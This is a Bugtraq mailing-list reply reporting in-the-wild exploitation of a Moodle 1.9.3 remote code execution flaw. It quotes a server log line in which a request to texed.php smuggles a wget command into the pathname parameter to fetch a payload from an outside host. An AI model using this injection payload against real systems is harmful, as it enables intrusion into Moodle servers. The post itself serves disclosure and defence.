Bugtraq mailing list archives

Re: Moodle 1.9.3 Remote Code Execution

From: lent () cooper edu
Date: Sun, 14 Dec 2008 22:00:03 -0700

Exploit in the wild:

We saw this come across:

216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET /filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O 
perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218


The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 -0500].

Chris Lent
Tel: +1.212.353.4350

Current thread:

Moodle 1.9.3 Remote Code Execution ascii (Dec 12)
- <Possible follow-ups>
- Re: Moodle 1.9.3 Remote Code Execution lent (Dec 15)
  - Re: Moodle 1.9.3 Remote Code Execution Jamie Riden (Dec 15)
- Re: Re: Moodle 1.9.3 Remote Code Execution martin (Dec 16)
- Re: Moodle 1.9.3 Remote Code Execution hackeriri (Dec 16)